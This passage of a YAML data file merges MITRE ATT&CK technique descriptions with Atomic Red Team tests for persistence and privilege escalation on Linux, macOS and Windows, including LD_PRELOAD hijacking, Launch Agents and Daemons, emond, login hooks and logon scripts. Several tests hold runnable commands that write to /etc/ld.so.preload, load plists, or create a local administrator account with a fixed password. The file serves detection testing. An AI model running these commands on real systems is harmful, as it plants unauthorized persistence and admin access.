Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) - id: attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:50:36.235Z' - created: '2020-01-24T14:21:52.750Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: Monitor processes for those that may be used to modify binary - headers. Monitor file systems for changes to application binaries and invalid - checksums/signatures. Changes to binaries that do not line up with application - updates or patches are also extremely suspicious. - x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Binary file metadata - x_mitre_platforms: - - macOS - atomic_tests: [] - T1574.006: - technique: - id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 - description: |- - Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) - - Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. 
LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997) - - LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process. - name: LD_PRELOAD - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.006 - url: https://attack.mitre.org/techniques/T1574/006 - - external_id: CAPEC-13 - source_name: capec - url: https://capec.mitre.org/data/definitions/13.html - - external_id: CAPEC-640 - source_name: capec - url: https://capec.mitre.org/data/definitions/640.html - - source_name: Man LD.SO - url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved - June 15, 2020. - - source_name: TLDP Shared Libraries - url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved - January 31, 2020. - - source_name: Code Injection on Linux and macOS - url: https://www.datawire.io/code-injection-on-linux-and-macos/ - description: 'Itamar Turner-Trauring. (2017, April 18). “This will only hurt - for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved - December 20, 2017.' - - url: http://hick.org/code/skape/papers/needle.txt - description: skape. (2003, January 19). Linux x86 run-time process manipulation. 
- Retrieved December 20, 2017. - source_name: Uninformed Needle - - url: http://phrack.org/issues/51/8.html - description: halflife. (1997, September 1). Shared Library Redirection Techniques. - Retrieved December 20, 2017. - source_name: Phrack halfdead 1997 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:49:46.904Z' - created: '2020-03-13T20:09:59.569Z' - x_mitre_platforms: - - Linux - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Environment variable - x_mitre_detection: |- - Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes. - - Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1574.006 - atomic_tests: - - name: Shared Library Injection via /etc/ld.so.preload - auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - description: "This test adds a shared library to the `ld.so.preload` list to - execute and intercept API calls. This technique was used by threat actor Rocke - during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon - successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. 
- \n" - supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - -' - cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - -' - name: bash - elevation_required: true - - name: Shared Library Injection via LD_PRELOAD - auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - description: | - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. - - Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. 
- supported_platforms: - - linux - input_arguments: - path_to_shared_library_source: - description: Path to a shared library source code - type: Path - default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c - path_to_shared_library: - description: Path to a shared library object - type: Path - default: "/tmp/T1574006.so" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_to_shared_library}) - -' - prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - -' - executor: - command: 'LD_PRELOAD=#{path_to_shared_library} ls - -' - name: bash - T1547.008: - technique: - created: '2020-01-24T18:38:55.801Z' - modified: '2020-03-25T16:52:26.567Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4 - description: |- - Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) - - Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. 
- name: LSASS Driver - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.008 - url: https://attack.mitre.org/techniques/T1547/008 - - url: https://technet.microsoft.com/library/cc961760.aspx - description: Microsoft. (n.d.). Security Subsystem Architecture. Retrieved - November 27, 2017. - source_name: Microsoft Security Subsystem - - url: https://technet.microsoft.com/library/dn408187.aspx - description: Microsoft. (2014, March 12). Configuring Additional LSA Protection. - Retrieved November 27, 2017. - source_name: Microsoft LSA Protection Mar 2014 - - url: https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx - description: Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November - 27, 2017. - source_name: Microsoft DLL Security - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Vincent Le Toux - x_mitre_data_sources: - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events - 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: - Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. - (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc - utility (Citation: TechNet Autoruns) to examine loaded drivers associated - with the LSA. 
" - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - atomic_tests: [] - T1543.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.001 - url: https://attack.mitre.org/techniques/T1543/001 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ - description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware - is hungry for credentials. Retrieved July 3, 2017. - source_name: OSX Keydnap malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/ - description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated - code. Retrieved July 5, 2017. - source_name: Antiquated Mac Malware - - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web - traffic. Retrieved July 10, 2017. - source_name: OSX.Dok Malware - - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ - description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). - Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. - source_name: Sofacy Komplex Trojan - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. 
(2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update - description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application - Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. - source_name: OceanLotus for OS X - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Agent - description: "Adversaries may create or modify launch agents to repeatedly execute - malicious payloads as part of persistence. Per Apple’s developer documentation, - when a user logs in, a per-user launchd process is started which loads the - parameters for each launch-on-demand user agent from the property list (plist) - files found in /System/Library/LaunchAgents, /Library/LaunchAgents, - and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent - Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). - These launch agents have property list files which point to the executables - that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install - a new launch agent that can be configured to execute at login by using launchd - or launchctl to load a plist into the appropriate directories (Citation: - Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The - agent name may be disguised by using a name from a related operating system - or benign software. Launch Agents are created with user level privileges and - are executed with the privileges of the user when they log in (Citation: OSX - Malware Detection) (Citation: OceanLotus for OS X). 
They can be set up to - execute when a specific user logs in (in the specific user’s directory structure) - or when any user logs in (which requires administrator privileges)." - id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T22:11:45.513Z' - created: '2020-01-17T16:10:58.592Z' - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: Monitor Launch Agent creation through additional plist files - and utilities such as Objective-See’s KnockKnock application. Launch Agents - also require files on disk for persistence which can also be monitored via - other file monitoring applications. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_platforms: - - macOS - identifier: T1543.001 - atomic_tests: - - name: Launch Agent - auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 - description: 'Create a plist and execute it - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; - exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - if [ ! 
-d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; - sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} - sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} - cleanup: | - sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} - sudo rm ~/Library/LaunchAgents/#{plist_filename} - T1543.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1543.004 - url: https://attack.mitre.org/techniques/T1543/004 - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf - description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical - OS X Malware Detection & Analysis. Retrieved July 10, 2017.' - source_name: OSX Malware Detection - - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf - description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. - Retrieved July 10, 2017.' 
- source_name: WireLurker - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launch Daemon - description: "Adversaries may create or modify launch daemons to repeatedly - execute malicious payloads as part of persistence. Per Apple’s developer documentation, - when macOS and OS X boot up, launchd is run to finish system initialization. - This process loads the parameters for each launch-on-demand system-level daemon - from the property list (plist) files found in /System/Library/LaunchDaemons - and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent - Daemons). These LaunchDaemons have property list files which point to the - executables that will be launched (Citation: Methods of Mac Malware Persistence). - \n\nAdversaries may install a new launch daemon that can be configured to - execute at startup by using launchd or launchctl to load a plist into the - appropriate directories (Citation: OSX Malware Detection). The daemon name - may be disguised by using a name from a related operating system or benign - software (Citation: WireLurker). Launch Daemons may be created with administrator - privileges, but are executed under root privileges, so an adversary may also - use a service to escalate privileges from administrator to root. \n\nThe plist - file permissions must be root:wheel, but the script or program that it points - to has no such requirement. So, it is possible for poor configurations to - allow an adversary to modify a current Launch Daemon’s executable and gain - persistence or Privilege Escalation. 
" - id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:46:44.130Z' - created: '2020-01-17T19:23:15.227Z' - x_mitre_data_sources: - - File monitoring - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor for launch daemon creation or modification through - plist files and utilities such as Objective-See''s KnockKnock application. ' - x_mitre_platforms: - - macOS - identifier: T1543.004 - atomic_tests: - - name: Launch Daemon - auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf - description: 'Utilize LaunchDaemon to launch `Hello World` - -' - supported_platforms: - - macos - input_arguments: - plist_filename: - description: filename - type: string - default: com.atomicredteam.plist - path_malicious_plist: - description: Name of file to store in cron folder - type: string - default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" - dependency_executor_name: bash - dependencies: - - description: 'The shared library must exist on disk at specified location - (#{path_malicious_plist}) - -' - prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit - 1; fi; - -' - get_prereq_command: 'echo "The plist file doesn''t exist. 
Check the path and - try again."; exit 1; - -' - executor: - name: bash - elevation_required: true - command: | - sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} - sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | - sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} - sudo rm /Library/LaunchDaemons/#{plist_filename} - T1053.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1053.004 - url: https://attack.mitre.org/techniques/T1053/004 - - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html - description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved - July 10, 2017. - source_name: AppleDocs Launch Agent Daemons - - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf - description: Patrick Wardle. (2014, September). Methods of Malware Persistence - on Mac OS X. Retrieved July 5, 2017. - source_name: Methods of Mac Malware Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Launchd - description: |- - Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). 
- - An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. - id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-23T22:41:14.739Z' - created: '2019-12-03T14:15:27.452Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_remote_support: false - x_mitre_permissions_required: - - root - x_mitre_detection: "Monitor scheduled task creation from common utilities using - command-line invocation. Legitimate scheduled tasks may be created during - installation of new software or through system administration functions. Look - for changes to tasks that do not correlate with known software, patch cycles, - etc. \n\nSuspicious program execution through scheduled tasks may show up - as outlier processes that have not been seen before when compared against - historical data. Data and events should not be viewed in isolation, but as - part of a chain of behavior that could lead to other activities, such as network - connections made for Command and Control, learning details about the environment - through Discovery, and Lateral Movement." 
- x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring - x_mitre_platforms: - - macOS - identifier: T1053.004 - atomic_tests: - - name: Event Monitor Daemon Persistence - auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e - description: "This test adds persistence via a plist to execute via the macOS - Event Monitor Daemon. \n" - supported_platforms: - - macos - input_arguments: - script_location: - description: evil plist location - type: path - default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" - script_destination: - description: Path where to move the evil plist - type: path - default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" - empty_file: - description: Random name of the empty file used to trigger emond service - type: string - default: randomflag - executor: - name: bash - elevation_required: true - command: | - sudo cp #{script_location} #{script_destination} - sudo touch /private/var/db/emondClients/#{empty_file} - cleanup_command: | - sudo rm #{script_destination} - sudo rm /private/var/db/emondClients/#{empty_file} - T1078.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts - description: "Adversaries may obtain and abuse credentials of a local account - as a means of gaining Initial Access, Persistence, Privilege Escalation, or - Defense Evasion. Local accounts are those configured by an organization for - use by users, remote support, services, or for administration on a single - system or service.\n\nLocal Accounts may also be abused to elevate privileges - and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). 
- Password reuse may allow the abuse of local accounts across a set of machines - on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' - created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1078.003 - atomic_tests: - - name: Create local account with admin priviliges - auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 - description: After execution the new account will be active and added to the - Administrators group - supported_platforms: - - windows - executor: - command: |- - net user art-test /add - net user art-test Password123! - net localgroup administrators art-test /add - cleanup_command: |- - net localgroup administrators art-test /delete >nul 2>&1 - net user art-test /delete >nul 2>&1 - name: command_prompt - elevation_required: true - T1037.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.002 - url: https://attack.mitre.org/techniques/T1037/002 - - url: https://support.apple.com/de-at/HT2420 - description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved - July 17, 2017.' 
- source_name: creating login hook - - source_name: S1 macOs Persistence - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved - March 27, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Logon Script (Mac) - description: "Adversaries may use macOS logon scripts automatically executed - at logon initialization to establish persistence. macOS allows logon scripts - (known as login hooks) to be executed whenever a specific user logs into a - system. A login hook tells Mac OS X to execute a certain script when a user - logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), - a login hook executes as the elevated root user.(Citation: creating login - hook)\n\nAdversaries may use these login hooks to maintain persistence on - a single system.(Citation: S1 macOs Persistence) Access to login hook scripts - may allow an adversary to insert additional malicious code. There can only - be one login hook at a time though and depending on the access configuration - of the hooks, either local credentials or an administrator account may be - necessary. " - id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-27T16:49:15.786Z' - created: '2020-01-10T16:01:15.995Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. 
- x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - identifier: T1037.002 - atomic_tests: - - name: Logon Scripts - Mac - auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 - description: 'Mac logon script - -' - supported_platforms: - - macos - executor: - steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. - Populate the plist with the location of your shell script\n\n sudo defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. - Create the required plist file in the target user's Preferences directory\n\n\t - \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. - Populate the plist with the location of your shell script\n\n\t defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" - name: manual - T1037.001: - technique: - id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 - description: "Adversaries may use Windows logon scripts automatically executed - at logon initialization to establish persistence. Windows allows logon scripts - to be run whenever a specific user or group of users log into a system.(Citation: - TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript - Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these - scripts to maintain persistence on a single system. Depending on the access - configuration of the logon scripts, either local credentials or an administrator - account may be necessary. 
" - name: Logon Script (Windows) - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.001 - url: https://attack.mitre.org/techniques/T1037/001 - - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx - description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved - April 27, 2016. - source_name: TechNet Logon Scripts - - source_name: Hexacorn Logon Scripts - url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ - description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part - 18. Retrieved November 15, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:03.153Z' - created: '2020-01-10T03:43:37.211Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. - - Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.001 - atomic_tests: - - name: Logon Scripts - auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 - description: | - Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key - that can be viewed in the Registry Editor. 
- supported_platforms: - - windows - input_arguments: - script_path: - description: Path to .bat file - type: String - default: "%temp%\\art.bat" - script_command: - description: Command To Execute - type: String - default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt - executor: - command: | - echo "#{script_command}" > #{script_path} - REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f - cleanup_command: | - REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 - del #{script_path} >nul 2>&1 - del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 - name: command_prompt - T1134.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1134.003 - url: https://attack.mitre.org/techniques/T1134/003 - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Make and Impersonate Token - description: Adversaries may make and impersonate tokens to escalate privileges - and bypass access controls. If an adversary has a username and password but - the user is not logged onto the system, the adversary can then create a logon - session for the user using the LogonUser function. The function - will return a copy of the new session's access token and the adversary can - use SetThreadToken to assign the token to a thread. 
